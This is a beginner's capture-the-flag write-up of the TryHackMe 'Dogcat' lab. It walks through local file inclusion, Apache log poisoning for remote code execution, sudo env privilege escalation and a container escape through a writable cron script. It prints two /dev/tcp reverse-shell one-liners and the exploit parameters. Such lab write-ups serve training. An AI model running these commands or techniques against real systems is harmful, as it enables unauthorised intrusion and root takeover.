Home Dogcat tryhackme writeup

Dogcat tryhackme writeup

kek Writeup of me, Bltz, resolving tryhackme’s easy room ‘All in One’, this is my first writeup of many. I’m a begginer so i might make some mistakes!

AllinOne info

This CTF room include the next topics:

  • Local file inclusion
  • Use of php wrapper with LFI
  • Fuzzing
  • Double privilege escalation
  • Abusing sudo privileges


A fast nmap scan gives me 2 ports that i use to rescan with -sCV options for services and versions, but no interesting information is shown. Nmap scan for open ports First scan with Nmap

I scanned the web too with whatweb but all versions are up to date and there’s nothing unusual.



Looking at the website i see 2 buttons that seems to display a random cat/dog image with the get var “view”, i try to modify the var value to something else and i got an error saying that only cat or dog are correct inputs. Then i try to use dogdog as “view” variable to see if any kind of filter id applying and it is, a new error shown, dogdog.php file doesn’t exist.

error shown A new error is shown

This seems like LFI to me 😉

Gaining access


First thing i try is to use null byte with ../dog/../../../../../etc/passwd%00 but an error is shown in the function include(). I dont know what include() does but if i dont use %00 at the end of the string .php will be applied as extension and i couldn’t open other types of file. I try to use the php wrapper to encode index.php to base64 to get the source code and it works, after decoding it i get this: index source code index.php source code

There’s another var i didn’t see named “ext” that is the extension applied to the “view” var, being the default value .php. Then, writing ?view=../dog/../../../../../etc/passwd%00&ext= i manage to get /etc/passwd content.

passwd content /etc/passwd content

Having this i quickly think in log posoning, and apache2 log var/log/apache2/access.log does the trick

Acess to apache2 log Apache2 log is shown

I modify a request with burpsuite changing the user agent to a little php code so we can execute commands remotely.

Burpsuite modify request Modified request with burpsuite

I write whoami into our new cmd variable and i check if it’s working and it is. whoami rce RCE working

I url encode the code bellow and pass it as “cmd” variable and i send a bash to my netcat through 443 port where i was prevously listening.

bash -c 'bash -i &> /dev/tcp/<MYIP>/443 0>&1'

whoami rce shell as www-data

Privilege escalation

Escalation to low privilege user

I check the sudo privileges for www-data and i can run env as root.

www-data privileges www-data sudo privileges and privesc to root

With this code we quickly privesc to root.

sudo env /bin/sh

Right now I’m looking for the flags, one is in /var/www/html/. I dont find the second one so i do find / -name flag* and i get both 2 and 3, 2 is in /var/www and 3 in /root. Im stuck because i cant find flag 4. I tried some things, finaly i’ve just found a script and a .tar in /opt. When inspecting the script i realize that this is a docker container, and a hostname -I confirms it.

Knowing this i think that maybe the script is involved in a cronjob that backups the website from time to time. With the script beign writable, i just modify it to send me a shell as root (the owned and the one executing the cron job). But as this docker container doesn’t have nano or vi/vim i have to do it with echo.

echo '#!/bin/bash' > FILE
echo "bash -c 'bash -i >& /dev/tcp/MYIP/444 0>&1'" >> FILE

With this i gain access as the real root user and the flag4.txt is located at /root of the real host.

I hope this writeup was useful and interesting, see you soon!

This post is licensed under CC BY 4.0 by the author.